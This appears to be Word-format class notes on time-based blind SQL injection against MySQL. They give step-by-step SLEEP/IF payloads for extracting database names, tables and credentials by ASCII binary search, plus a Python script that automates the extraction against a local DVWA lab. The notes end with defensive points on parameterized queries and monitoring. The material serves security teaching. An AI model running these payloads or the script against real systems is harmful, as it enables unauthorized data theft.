          <v:rect id="_x0000_i1101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ADBE5B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0: Confirm the parameter is injectable (baseline timing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C86CA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✅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Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767BFC80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 a normal request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D92A3ED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?id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA78474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Observe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E912950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Response time is normal (say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~100–300 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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becomes your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baseline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EAAD5E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C3BC8A">
          <v:rect id="_x0000_i1102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7309B7AD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Prove you can influence execution time (delay test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D86175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Action (MySQL example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461F97DA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Inject a delay:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45115193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?id=1 AND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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447343E7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the server executes (conceptually)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500C40C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users WHERE id = 1 AND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96DACA4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Observe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F84F6D4" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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response is delayed by ~5 seconds →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injection confirmed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE0866" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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no delay → maybe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94DB50" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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 isn’t MySQL (different delay function)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAE76FC" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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context is different (string vs numeric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2317831B" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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WAF/filtering is blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580D6951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Note: In MySQL,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so the WHERE may become false, but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delay still occurs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8E1F58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24D8B2">
          <v:rect id="_x0000_i1103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855416C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Build a TRUE/FALSE timing condition (core concept)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB8687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you create an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condition, delay, no-delay)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A24CF05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Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3126D4D3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?id=1 AND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1=1,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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BF6C9B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SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB65ADC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users WHERE id=1 AND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1=1,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5), 0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1C8A0FC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Observe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D4AF26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Delay happens → the TRUE branch executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72502935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test FALSE branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0849BF62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?id=1 AND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1=2,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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FC016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delay → FALSE branch executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B8C948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this point you have a reliable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timing oracle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40EBF52" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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Delayed response = condition TRUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CEA9D9" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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Fast response = condition FALSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2756A361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99E0FC">
          <v:rect id="_x0000_i1104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C686E5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Start extracting data one bit/character at a time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7831E40B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Common target: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 name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066692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Goal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999AA28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Determine first character of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21A66F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Action (test if 1st char is 't')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FACB5C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?id=1 AND IF(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),1,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1)=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't',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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60587CDC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SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBAE840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users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WHERE id=1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AND IF(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),1,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1)=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't',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5), 0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66CC168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Observe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55448AAC" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Delay ≈ 5s → first character is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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4188C4CC" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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delay → first character is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t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F2978F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58DF7E">
          <v:rect id="_x0000_i1105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AD0D70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Systematically guess the character (enumeration loop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E935E9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You repeat Step 3 with different guesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC61CA3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...='a'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...='b'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...='c'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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74456FC1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one that delays is the correct character.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD3773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slow if you do 26+ tries per character, so attackers optimize using ASCII comparisons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA505D4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82B2A0">
          <v:rect id="_x0000_i1106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DD61B1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Faster extraction using ASCII (binary search style)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9AEAC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guessing exact character, compare its ASCII value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AEE17D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Action: Is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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ASCII(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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first char) &gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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109 ?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="480D4C8E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?id=1 AND IF(ASCII(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),1,1))&gt;109,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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EBCC0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1EDBF170" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Delay → ASCII value is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greater than 109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CA0770" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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delay → ASCII value is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≤ 109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8C44E8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narrow the range like binary search (fewer requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C3D72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sequence (conceptual):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DE4A1" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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109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?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6508C064" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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116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?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BC9AD3F" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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112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?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="23081976" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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116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?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="08C599F7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reduces requests from ~50 per char to ~6–7 per char.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB040E5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0B7367">
          <v:rect id="_x0000_i1107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B65274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Move to next character position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38860DFF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position 1 is known, extract position 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D3D205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?id=1 AND IF(ASCII(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),2,1))&gt;109,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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CD040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for position 3, 4, … until you hit end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383DF733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56F0A3">
          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C413219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7: Detect end of string (stop condition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2BC95E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A: Check length first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D8DE49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?id=1 AND IF(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LENGTH(database())=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6,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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D466C4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B: Check if substring is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37775BA6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?id=1 AND IF(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),7,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1)=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'',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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903BF1A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true, you know you’re past the last character and can stop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC73372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5A7C39">
          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D5E94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8: Expand to other targets (tables, columns, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F21626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Once you can extract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you move to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2948AD76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Tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643352DE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table_name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information_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schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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WHERE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table_schema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LIMIT 0,1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFF0809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time-extract characters from that result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E3FEA4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Payload pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AC83FC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?id=1 AND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IF(ASCII(SUBSTRING(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(SELECT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table_name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information_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schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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WHERE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table_schema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LIMIT 0,1),1,1))&gt;109,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5), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03505369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method for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C9619" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01370458" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE647C" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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version, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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current_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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  <w:proofErr w:type="spellEnd"/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B51AB95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5C7CD7">
          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="673063D2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this works (DB parser / execution view)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46725052" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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 concatenates input into SQL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 parsing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803C3F" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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DB query parser treats injected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IF(...)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valid grammar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14940A4A" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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engine evaluates the IF condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5B84B7" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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condition TRUE →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executes → response delayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FF0D10" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Attacker measures time and learns TRUE/FALSE about secret data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA4FB93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2DE766">
          <v:rect id="_x0000_i1111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A540B4B" w14:textId="5E505513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Practical Notes (important in labs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654234BB" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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a threshold: e.g.,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&gt;3 seconds = TRUE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else FALSE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EDC6C5" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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jitter can cause false positives; repeat each test 2–3 times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF4F6E" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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delay values like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3–5 seconds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(not too high).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6FCF5" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812865">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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 even when output is hidden because time is observable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D66A80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controlled-lab automation script</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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 for demonstrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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Time-Based Blind SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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 against a </w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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local DVWA-style vulnerable endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC0AC18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28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Important</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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br/>
        <w:t xml:space="preserve">Use this </w:t>
      </w:r>
      <w:r w:rsidRPr="008128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ONLY in your own lab environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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 (e.g., XAMPP + DVWA on localhost).</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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br/>
        <w:t>Never run against systems without explicit authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2396F30E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pict w14:anchorId="2730A275">
          <v:rect id="_x0000_i1123" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F72DDC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Assumptions (Lab Setup)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A73F97" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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DVWA running locally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3F68A3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http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779DF474" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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level: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7EBAC" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Vulnerable parameter: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</w:p>
    <w:p w14:paraId="07D8DDC2" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Injection method: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C01EC4" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Database: MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56691404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D53035">
          <v:rect id="_x0000_i1124" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1831D1B5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Extraction Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46CC4B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will:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19183449" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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 injection via delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509AA298" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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DB name length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575C8566" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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each character using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13766E47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ASCII(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database(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),pos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,1)) &gt; mid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41715390" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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8128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binary search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minimize requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339F96E0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A72298">
          <v:rect id="_x0000_i1125" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6BE7DE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🐍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Mini Automation Script (Python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AAF6FB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import time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import string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=============================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CONFIGURATION (LAB ONLY)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=============================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TARGET_URL = "http://127.0.0.1/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dvwa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/vulnerabilities/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sqli_blind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/"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COOKIES = {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"PHPSESSID": "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your_session_id_here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"security": "low"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DELAY = 3           # seconds used in SLEEP()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THRESHOLD = 2.5     # response time threshold for TRUE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=============================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FUNCTION: Send Payload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=============================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def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is_condition_true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(payload):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params = {"id": payload, "Submit": "Submit"}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start =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time.time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response =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requests.get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(TARGET_URL, params=params, cookies=COOKIES)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elapsed =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time.time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 start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elapsed &gt; THRESHOLD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=============================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STEP 1: Determine Database Length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=============================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def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get_db_length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max_length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=30):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print("[*] Determining database name length...")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for length in range(1,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max_length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+ 1):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payload = f"1 AND IF(LENGTH(database())={length}, SLEEP({DELAY}), 0)-- -"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if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is_condition_true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(payload):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print(f"[+] Database length found: {length}")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return length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print("[-] Length not found within range.")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None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=============================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STEP 2: Extract Each Character (Binary Search)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=============================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def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extract_db_name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(length):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""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print("[*] Extracting database name...")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for position in range(1, length + 1):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low = 32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high = 126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while low &lt;= high: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mid = (low + high) // 2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payload = (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f"1 AND IF(ASCII(SUBSTRING(database(),{position},1))&gt;"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f"{mid}, SLEEP({DELAY}), 0)-- -"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if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is_condition_true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(payload):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low = mid + 1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else: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high = mid - 1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char = chr(low)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char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print(f"[+] Position {position}: {char}")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=============================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MAIN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=============================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__name__ == "__main__":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print("=== Time-Based Blind SQLi Automation (LAB USE ONLY) ===\n")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length =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get_db_length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if length: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extract_db_name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(length)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print(f"\n[</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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Database Name Extracted: {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else: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print("Extraction failed.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D1D207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E6E3AF">
          <v:rect id="_x0000_i1126" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73731E06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🔎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Use in Your Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2253B0F6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81286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Login to DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB88CAE" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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DVWA in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F9DBB5" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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3D6E8931" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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your 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PHPSESSID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cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491FFDB" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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in script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00115359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COOKIES = {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"PHPSESSID": "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paste_here</w:t>
      </w:r>
      <w:proofErr w:type="spell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"security": "low"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33B72831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B9687A">
          <v:rect id="_x0000_i1127" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="148DB5BF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81286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128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Run Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B822E9D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time_sqli_extract.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4308C9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E9BC45">
          <v:rect id="_x0000_i1128" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4F95C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Happens Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CF1F74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 each character:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF68799" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Script sends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBCC5FC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id=1 AND IF(ASCII(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SUBSTRING(database(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),1,1))&gt;109,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3),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0)--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</w:p>
    <w:p w14:paraId="24042060" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Measures response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5AD5D2" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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delayed → condition TRUE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C9B60D" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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binary search to determine ASCII value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4559E59E" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Repeats until full database name reconstructed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CAB086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E857C8">
          <v:rect id="_x0000_i1129" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2BB28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 Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B32A308" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081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[*] Determining database name length...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[+] Database length </w:t>
      </w:r>
      <w:proofErr w:type="gram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found:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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[*] Extracting database name...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[+] Position 1: d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[+] Position 2: v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[+] Position 3: w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[+] Position 4: a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</w:t>
      </w:r>
      <w:r w:rsidRPr="00812865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Database Name Extracted: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008128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dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50A537E8" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812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7C690A">
          <v:rect id="_x0000_i1130" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E9C7D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🎓</w:t>
      </w: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Academic Notes (For Your Class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A6661D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demonstrates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8465E" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Side-channel attack via timing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA06A34" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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 inference without output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E170F81" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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DBMS execution delay exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA8DB2" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Importance of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DACA98" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049AF666" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Parameterized queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EB5DFA" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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WAF anomaly detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B811F21" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="00812865">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22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Response-time anomaly monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D1C33" w14:textId="77777777" w:rsidR="00812865" w:rsidRDefault="00812865"/>
    <w:p w14:paraId="55E3B801" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081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Changes Under HTTPS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16D043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DVWA runs over HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32406246" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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Payload not visible in Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B06D94A" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="008128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only see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CADF20" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081286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TLS handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DE9031" w14:textId="77777777" w:rsidR="00812865" w:rsidRPr="00812865" w:rsidRDefault="00812865" w:rsidP="0081286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Encrypted Application Data</w:t>
      </w:r>
    </w:p>
